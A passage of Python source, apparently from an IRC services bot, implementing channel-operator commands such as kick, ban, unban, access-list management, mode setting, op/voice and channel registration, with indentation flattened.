kicker_l = check_channel_access(conn, channel, nick)
try:
chk = self.chans[chan].onlist[kicked_uid]
except:
pass
if kicked_user_l <= kicker_l and protstatus != 1:
reason = "({}) {}\n".format(nick, reason)
data = ":00000000A KICK {} {} :{}\n".format(channel, kicked, reason)
print(data)
self.sockssl.send(data.encode('ascii'))
send_notice_as_chanop(self, nick, "Kicked user {}".format(kicked))
del self.chans[chan].onlist[kicked_uid]
else:
send_notice_as_chanop(self, nick, "ERROR: Cannot kick user {}\n".format(kicked))
else:
send_notice_as_chanop(self, nick, "ERROR: There is no user called {} in {}.\n".format(kicked, channel))
print("users on channel {}".format(channel))
for usr in self.chans[chan].onlist:
print("user is: {} with modes: {}".format(usr, self.chans[chan].onlist[usr]))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for kick: <username> [reason]")
else:
send_notice_as_chanop(self, nick, "ERROR: A level of 50 is required to kick users.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_adduser(self, prefix, command, params):
nick = prefix[1:]
channel = params[0]
chan = channel[1:]
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
if check_channel_access(conn, channel, nick) >= 150:
if len(params) >= 3:
adduser = params[2]
adduser = adduser.strip()
level = 100
if len(params) == 4:
try:
level = int(params[3])
if level >= 200:
level = 199
elif level < 1:
level = 1
except:
level = 100
else:
level = 100
results = False
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, adduser)
if results == True:
conn = create_connection("channels.db")
with conn:
ret = 0
ret = check_channel_access(conn, channel, adduser)
if ret == 0:
aop = 1
aov = 0
prot = 1
results = assign_access_list(conn, channel, adduser, level, aop, aov, prot)
send_notice_as_chanop(self, nick, "Added {} to {} with level {} access.".format(adduser, channel, str(level)))
else:
send_notice_as_chanop(self, nick, "ERROR: {} already has access to {}.".format(adduser, channel))
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(adduser))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for adduser: <username> <level>")
send_notice_as_chanop(self, nick, "The level is optional and between 1-199.")
else:
send_notice_as_chanop(self, nick, "ERROR: A level of 150 is required to add users.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_setuser(self, prefix, command, params):
setuser = ""
setuser_l = ""
cmd = ""
state = ""
nick = prefix[1:]
channel = params[0]
chan = channel[1:]
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
level = check_channel_access(conn, channel, nick)
if level >= 150:
if len(params) >= 5:
cmd = params[3]
state = params[4].strip()
setuser = params[2]
if setuser == nick:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You cannot modify your own access level.")
return
try:
setuser_l = check_channel_access(conn, channel, setuser)
except:
print("{} has no channel access\n".format(deluser))
results = False
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, setuser)
if results == True:
conn = create_connection("channels.db")
with conn:
if cmd == 'level':
try:
lvl = params[4].strip()
except:
pass
if lvl.isnumeric():
lvl = int(lvl)
if lvl < level:
set_user_level(conn, chan, setuser, lvl)
self.send_msg_as("chanop", "NOTICE", nick, "Set user access level for {} to {}.\n".format(setuser,lvl))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: Cannot set user to a level higher than your access level of {}.".format(level))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <level> <1-{}>".format(level-1))
elif setuser_l <= level and setuser_l != 0:
if cmd == 'prot':
if state == 'on' or state == 'off':
set_prot_channel_state(conn, chan, setuser, state)
self.send_msg_as("chanop", "NOTICE", nick, "Set user {} setting {} {}.\n".format(setuser, cmd.upper(), state.upper()))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <prot/aop/aov> <on/off>")
elif cmd == 'aov':
if state == 'on' or state == 'off':
set_aov_channel_state(conn, chan, setuser, state)
self.send_msg_as("chanop", "NOTICE", nick, "Set user {} setting {} {}.\n".format(setuser, cmd.upper(), state.upper()))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <prot/aop/aov> <on/off>")
elif cmd == 'aop':
if state == 'on' or state == 'off':
set_aop_channel_state(conn, chan, setuser, state)
self.send_msg_as("chanop", "NOTICE", nick, "Set user {} setting {} {}.\n".format(setuser, cmd.upper(), state.upper()))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <prot/aop/aov> <on/off>")
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <prot/aop/aov> <on/off>")
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <level> <1-{}>".format(level-1))
elif setuser_l == 0:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} does not have access to {}.\n".format(setuser, chan))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: Cannot modify {}'s settings as they have higher channel access than you.\n".format(setuser))
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(setuser))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <prot/aop/aov> <on/off>")
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <level> <1-{}>".format(level-1))
else:
send_notice_as_chanop(self, nick, "ERROR: A level of 150 is required to set users.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_deluser(self, prefix, command, params):
deluser = ""
deluser_l = ""
nick = prefix[1:]
channel = params[0]
chan = channel[1:]
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
level = check_channel_access(conn, channel, nick)
if level >= 150:
if len(params) >= 3:
deluser = params[2].strip()
try:
deluser_l = check_channel_access(conn, channel, deluser)
except:
print("{} has no channel access\n".format(deluser))
results = False
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, deluser)
if results == True:
conn = create_connection("channels.db")
with conn:
if deluser == nick:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You can't delete yourself.\n")
elif deluser_l < level and deluser_l != 0:
self.send_msg_as("chanop", "NOTICE", nick, "Deleted user {}.\n".format(deluser))
delete_user_from_chan(conn, chan, deluser)
elif deluser_l == 0:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} does not have access to {}.\n".format(deluser, chan))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: Cannot delete {} as they have higher access than you.\n".format(deluser))
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(deluser))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for adduser: <username>")
else:
send_notice_as_chanop(self, nick, "ERROR: A level of 150 is required to delete users.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_topic(self, prefix, command, params):
nick = prefix[1:]
channel = params[0]
chan = channel[1:]
conn = create_connection("users.db")
title = ""
try:
if params[2]:
title = ' '.join(params[2:])
except:
title = ""
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
if check_channel_access(conn, channel, nick) >= 100:
try:
if params[2]:
self.send_msg_as("chanop", "TOPIC", channel, "{}\n".format(title))
set_channel_topic(conn, channel, title)
except:
send_notice_as_chanop(self, nick, "ERROR: You must specify a channel topic.")
else:
send_notice_as_chanop(self, nick, "ERROR: A level of 100 is required to use the topic command.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_ban(self, prefix, command, params):
chkid = 0
channel = params[0]
chan = channel[1:]
target = None
if len(params) > 2:
target = params[2].strip()
nick = prefix[1:]
try:
uid = nick_to_uid(self, target)
except:
uid = None
conn = create_connection("users.db")
with conn:
result = check_nickname_exists(conn, nick)
if result == True:
if target != None:
chkid = check_nickname_identified(conn, target)
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
if params[1] == ":`ban\r\n" and len(params) < 3:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: SYNTAX for ban is: <user|banmask> [-n|-uh|-nuh] [reason]")
else:
if check_channel_access(conn, channel, nick) >= 100:
if uid == None:
nickname = target
if '*' not in target:
vhost = nickname + "!*@*"
else:
vhost = target
sendserv = ":00000000A MODE {} +b {}\r\n".format(channel, vhost)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
bancount = len( self.chans[chan].bans )
self.chans[chan].bans.append( HostList(vhost, bancount))
else:
modes = 'nuh'
if len(params) == 4:
if params[3].strip() == '-uh' or params[3].strip() == '-h' or params[3].strip() == '-nuh':
mode = params[3].strip()
modes = mode[1:]
else:
reason = params[3].strip()
hst = self.users[uid].GetHost()
ident = self.users[uid].GetIndent()
nickname = self.users[uid].GetNick()
chkprot = check_prot_status(conn, chan, target)
lvlban = check_channel_access(conn, channel, nick)
lvltarget = check_channel_access(conn, channel, target)
if lvlban < lvltarget and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be banned".format(target))
return
else:
ipchk = re.search(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', hst)
if ipchk:
hst = self.users[uid].GetVHost()
fullhost = nickname + '!' + ident + '@' + hst
print(f"mode is: {modes}")
print(f"host is: {fullhost}")
vhost = gethost(modes, fullhost)
if vhost == None:
vhost = nickname + "!*@*"
sendserv = ":00000000A MODE {} +b {}\r\n".format(channel,vhost)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
bindex = len( self.chans[chan].bans )
self.chans[chan].bans.append(HostList( vhost, bindex))
print("Added ban host: {}".format(vhost))
try:
if self.chans[chan].ison(uid):
reason = f"Requested by {nick}"
if len(params) >= 5:
reason = " ".join(params[4:])
data = ":00000000A KICK {} {} :{}\n".format(channel, target, reason)
print(data)
self.sockssl.send(data.encode('ascii'))
del self.chans[chan].onlist[uid]
print(f"Deleted uid {uid} from chan: {channel}")
except:
pass
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You require at least 100 channel access to use this command.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(chan))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_listban(self, prefix, command, params):
channel = params[0]
chan = channel[1:]
nick = prefix[1:]
totalbans = len( self.chans[chan].bans )
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 100:
if totalbans > 0:
self.send_msg_as("chanop", "NOTICE", nick, f"*** {channel} Ban List ({totalbans}) ***")
for i in range(0,totalbans):
self.send_msg_as("chanop", "NOTICE", nick, f"-- {i + 1} - {self.chans[chan].bans[i].host}")
self.send_msg_as("chanop", "NOTICE", nick, f"*** End of List ***")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: There are no bans for this channel")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: You require at least 100 channel access to use this command.")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {channel} is not a registered channel.")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {nick} has not identified to services.\n")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {nick} is not a registered nickname.")
def process_chanop_unban(self, prefix, command, params):
channel = params[0]
chan = channel[1:]
nick = prefix[1:]
totalbans = len( self.chans[chan].bans )
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 100:
if len(params) == 3:
totalbans = len( self.chans[chan].bans )
if totalbans > 0 and params[2] == '*\r\n':
wq = [ban.host for ban in self.chans[chan].bans]
self.chans[chan].bans.clear()
print(wq)
total = len(wq)
bq = []
for i in range(0,len(wq)):
if len(wq) > 0:
for ban in reversed(wq):
bq.append(ban)
wq.remove(ban)
if len(bq) == 6:
chanop_set_mode(self, channel, "-bbbbbb", "{}".format(" ".join(bq)))
bq = []
if len(bq) > 0:
chanop_set_mode(self, channel, "-{}".format(len(bq)*"b"), "{}".format(" ".join(bq)))
elif totalbans > 0 and '@' in params[2]:
target = params[2].strip()
for ban in reversed(self.chans[chan].bans):
if ban.host == target:
chanop_set_mode(self, channel, "-b", "{}".format(target))
del self.chans[chan].bans[ban.index]
break
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: There are no bans matching for this channel")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: SYNTAX for listban: <banmask|*>")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: You require at least 100 channel access to use this command.")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {channel} is not a registered channel.")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {nick} has not identified to services.\n")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {nick} is not a registered nickname.")
def process_chanop_set(self, prefix, command, params):
channel = params[0]
chan = channel[1:]
nick = prefix[1:]
nmode = False
pmode = False
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
if len(params) >= 3:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
if ret >= 100:
validmodes = "ntpims"
pmodes = []
nmodes = []
print("process set")
if len(params) == 4 and params[2] == "modes":
foundmodes = params[3].strip()
pmode = True if foundmodes[:1] == '+' else False
if pmode:
nmode = False
for mode in foundmodes:
if mode in validmodes:
if pmode:
pmodes.append(mode)
if nmode:
nmodes.append(mode)
if mode == '+':
pmode = True
nmode = False
if mode == '-':
nmode = True
pmode = False
modestr = ""
if len(pmodes) > 0:
modestr = "+" + "".join(pmodes)
if len(nmodes) > 0:
modestr = modestr + "-" + "".join(nmodes)
if len(modestr) > 0:
conn = create_connection("channels.db")
with conn:
set_channel_modes(conn, channel, modestr)
sendserv = ":{} MODE {} {}\n".format("00000000A",channel,modestr)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
self.send_msg_as("chanop", "NOTICE", nick, "Set channel mode to: {}\n".format(modestr))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: SYNTAX for set: <modes> [+ntpims|-ntpims]")
self.send_msg_as("chanop", "NOTICE", nick, "For example: set modes +nt-pims")
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You need at least 100 access to use this command.\n")
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You don\'t have operator access on {}.\n".format(channel))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: SYNTAX for set: <modes> [+ntpims|-ntpims]")
self.send_msg_as("chanop", "NOTICE", nick, "For example: set modes +nt-pims")
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_priv_halfopdehalfop(self, prefix, command, params):
conn = create_connection("users.db")
channel = params[0].strip()
lvlopper = 0
lvldehalfop = 0
nick = uid_to_nick(self, prefix[1:])
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
if len(params) >= 3:
channel = params[2].lower().strip()
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 75:
if len(params) == 3 or len(params) == 4 and params[3] == '\r\n':
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
ret = prefix[1:]
if ret is not None:
chan = channel[1:]
mod = getmodes(self, nick, chan)
chkmod = mod.find("%")
if chkmod == -1 and "devoice" not in params[1]:
self.chans[chan].onlist[ret] = mod + "%"
sendserv = ":00000000A MODE {} {}h {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod != -1 and "dehalfop" in params[1]:
strrep = mod
strrep = strrep.replace("%","")
self.chans[chan].onlist[ret] = strrep
sendserv = ":00000000A MODE {} {}h {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif len(params) >= 4:
chan = channel[1:]
conn = create_connection("users.db")
tbuffer = []
with conn:
voiceusers = map(str.strip, params[3:])
queue_buffer = []
for user in voiceusers:
chkid = 0
conn = create_connection("users.db")
ret = nick_to_uid(self, user)
chkid = check_nickname_identified(conn, user)
if ret is not None:
mod = getmodes(self, user, chan)
chkmod = mod.find("%")
if chkmod == -1 and "dehalfop" not in params[1]:
print("Adding % to user: {}".format(user))
self.chans[chan].onlist[ret] = mod + "%"
elif chkmod > 0 and "dehalfop" in params[1]:
conn = create_connection("channels.db")
with conn:
chkprot = check_prot_status(conn, chan, user)
lvldevoiced = check_channel_access(conn, channel, user)
if lvldevoiced > lvldehalfop and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be removed as half-op.\n".format(user))
continue
else:
print("Removing % from user: {}".format(user))
mod = mod.replace("%","")
self.chans[chan].onlist[ret] = mod
elif chkmod == -1 and "dehalfop" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not half-opped on {}.\n".format(user, channel))
continue
tbuffer.append(user)
if len(tbuffer) == 6:
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "h"*len(tbuffer), ' '.join(tbuffer))
queue_buffer.append(data)
print(data)
tbuffer = []
if len(tbuffer) > 0:
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "h"*len(tbuffer), ' '.join(tbuffer))
print(data)
queue_buffer.append(data)
self.sockssl.send(' '.join(queue_buffer).encode('ascii'))
tbuffer = []
queue_buffer = []
data = []
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You need at least 75 access to use this command.\n")
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not a registered channel.\n".format(channel))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for halfop/dehalfop: /msg ChanOP HALFOP/DEHALFOP #channel [users]")
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_priv_voicedevoice(self, prefix, command, params):
conn = create_connection("users.db")
channel = params[0].strip()
lvlopper = 0
lvldeopped = 0
nick = uid_to_nick(self, prefix[1:])
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
if len(params) >= 3:
channel = params[2].lower().strip()
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 75:
if len(params) == 3 or len(params) == 4 and params[3] == '\r\n':
if "devoice" in params[1]:
modes = "-"
else:
modes = "+"
ret = prefix[1:]
if ret is not None:
chan = channel[1:]
mod = getmodes(self, nick, chan)
chkmod = mod.find("+")
if chkmod == -1 and "devoice" not in params[1]:
self.chans[chan].onlist[ret] = mod + "+"
sendserv = ":00000000A MODE {} {}v {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod != -1 and "devoice" in params[1]:
strrep = mod
strrep = strrep.replace("+","")
self.chans[chan].onlist[ret] = strrep
sendserv = ":00000000A MODE {} {}v {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif len(params) >= 4:
chan = channel[1:]
conn = create_connection("users.db")
tbuffer = []
with conn:
voiceusers = map(str.strip, params[3:])
queue_buffer = []
for user in voiceusers:
chkid = 0
conn = create_connection("users.db")
ret = nick_to_uid(self, user)
chkid = check_nickname_identified(conn, user)
if ret is not None:
mod = getmodes(self, user, chan)
chkmod = mod.find("+")
if chkmod == -1 and "devoice" not in params[1]:
print("Adding + to user: {}".format(user))
self.chans[chan].onlist[ret] = mod + "+"
elif chkmod > 0 and "devoice" in params[1]:
conn = create_connection("channels.db")
with conn:
chkprot = check_prot_status(conn, chan, user)
lvldevoiced = check_channel_access(conn, channel, user)
if lvldevoiced > lvlopper and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be devoiced.\n".format(user))
continue
else:
print("Removing + from user: {}".format(user))
mod = mod.replace("+","")
self.chans[chan].onlist[ret] = mod
elif chkmod == -1 and "devoice" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not voiced on {}.\n".format(user, channel))
continue
tbuffer.append(user)
if len(tbuffer) == 6:
if "devoice" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "v"*len(tbuffer), ' '.join(tbuffer))
queue_buffer.append(data)
print(data)
tbuffer = []
if len(tbuffer) > 0:
if "devoice" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "v"*len(tbuffer), ' '.join(tbuffer))
print(data)
queue_buffer.append(data)
self.sockssl.send(' '.join(queue_buffer).encode('ascii'))
tbuffer = []
queue_buffer = []
data = []
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You need at least 75 access to use this command.\n")
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not a registered channel.\n".format(channel))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for voice/devoice: /msg ChanOP VOICE/DEVOICE #channel [users]")
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_priv_opdeop(self, prefix, command, params):
conn = create_connection("users.db")
channel = params[0].strip()
lvlopper = 0
lvldeopped = 0
nick = uid_to_nick(self, prefix[1:])
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
if len(params) >= 3:
channel = params[2].lower().strip()
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 100:
if len(params) == 3 or len(params) == 4 and params[3] == '\r\n':
if "deop" in params[1]:
modes = "-"
else:
modes = "+"
ret = prefix[1:]
if ret is not None:
chan = channel[1:]
mod = getmodes(self, nick, chan)
chkmod = mod.find("@")
if chkmod == -1 and "deop" not in params[1]:
self.chans[chan].onlist[ret] = mod + "@"
sendserv = ":00000000A MODE {} {}o {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod != -1 and "deop" in params[1]:
strrep = mod
strrep = strrep.replace("@","")
self.chans[chan].onlist[ret] = strrep
sendserv = ":00000000A MODE {} {}o {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif len(params) >= 4:
chan = channel[1:]
conn = create_connection("users.db")
tbuffer = []
with conn:
opusers = map(str.strip, params[3:])
queue_buffer = []
for user in opusers:
chkid = 0
conn = create_connection("users.db")
ret = nick_to_uid(self, user)
chkid = check_nickname_identified(conn, user)
if ret is not None:
mod = getmodes(self, user, chan)
chkmod = mod.find("@")
if chkmod == -1 and "deop" not in params[1]:
print("Adding @ to user: {}".format(user))
self.chans[chan].onlist[ret] = mod + "@"
elif chkmod > 0 and "deop" in params[1]:
conn = create_connection("channels.db")
with conn:
chkprot = check_prot_status(conn, chan, user)
lvldeopped = check_channel_access(conn, channel, user)
if lvldeopped > lvlopper and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be deopped.\n".format(user))
continue
else:
print("Removing @ from user: {}".format(user))
mod = mod.replace("@","")
self.chans[chan].onlist[ret] = mod
elif chkmod == -1 and "deop" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not opped on {}.\n".format(user, channel))
continue
tbuffer.append(user)
if len(tbuffer) == 6:
if "deop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "o"*len(tbuffer), ' '.join(tbuffer))
queue_buffer.append(data)
print(data)
tbuffer = []
if len(tbuffer) > 0:
if "deop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "o"*len(tbuffer), ' '.join(tbuffer))
print(data)
queue_buffer.append(data)
self.sockssl.send(' '.join(queue_buffer).encode('ascii'))
tbuffer = []
queue_buffer = []
data = []
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You need at least 100 access to use this command.\n")
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not a registered channel.\n".format(channel))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for op: /msg ChanOP OP #channel [users]")
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_register(self, prefix, command, params):
username = uid_to_nick(self, prefix[1:])
if username:
conn = create_connection("users.db")
with conn:
result = check_nickname_exists(conn, username)
if result == True:
if check_nickname_identified(conn, username) == True:
chan = params[2].strip()
chk_chan = re.search("^#.+", chan)
if chk_chan:
result = False
conn = create_connection("channels.db")
with conn:
result = check_channel_registered(conn, params[2].strip())
if result == False:
channel = chan[1:]
try:
isop = self.chans[channel].isop_uid(prefix[1:])
except:
isop = False
if isop == True:
register_channel(conn, params[2].strip(), username, "", "")
ret = create_access_list(conn, chan)
ret = assign_access_list(conn, chan, username, 200, 1, 0, 1)
sendserv = ":{} SJOIN {} {} + :00000000A\n".format(SERVICES_HEXCODE,str(int(time.time())), params[2].strip())
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
sendserv = ":00000000A MODE {} +aornt 00000000A 00000000A\n".format(params[2].strip())
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
else:
self.send_msg_as("chanop", "NOTICE", username, "ERROR: You must be a channel operator to register the channel.\n")
else:
sendserv = ":00000000A NOTICE {} :ERROR: Channel already registered.\n".format(username)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
else:
sendserv = ":00000000A NOTICE {} :ERROR: Not a valid channel name.\n".format(username)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
else:
self.send_msg_as("chanop", "NOTICE", username, "ERROR: {} has not identified to services.\n".format(username))
else:
sendserv = ":00000000A NOTICE {} :ERROR: {} is not a registered nickname.\n".format(username, username)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
def process_chanop_drop(self, prefix, command, params):
if params[2]:
username = uid_to_nick(self, prefix[1:])
if username:
conn = create_connection("users.db")
with conn:
result = check_nickname_exists(conn, username)
if result == True:
if check_nickname_identified(conn, username) == True:
chan = params[2].strip()
chk_chan = re.search("^#.+", chan)
if chk_chan:
result = False
conn = create_connection("channels.db")
with conn:
result = check_channel_registered(conn, params[2].strip())
if result == True:
owner = get_channel_owner(conn, chan)
if owner == username:
drop_channel(conn, chan)
sendserv = ":00000000A PART {}\n".format(chan)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
self.send_msg_as("chanop", "NOTICE", username, "Channel {} has been dropped.\n".format(chan))
else:
self.send_msg_as("chanop", "NOTICE", username, "ERROR: You must be the channel owner to drop it.")
else:
self.send_msg_as("chanop", "NOTICE", username, "ERROR: Channel {} is not registered.\n".format(chan))
else:
self.send_msg_as("chanop", "NOTICE", username, "ERROR: Channel {} is not a valid channel name.\n".format(chan))
else:
self.send_msg_as("chanop", "NOTICE", username, "ERROR: {} has not identified to services.\n".format(username))
else:
self.send_msg_as("chanop", "NOTICE", username, "ERROR: {} is not a registered nickname.\n".format(username))
else:
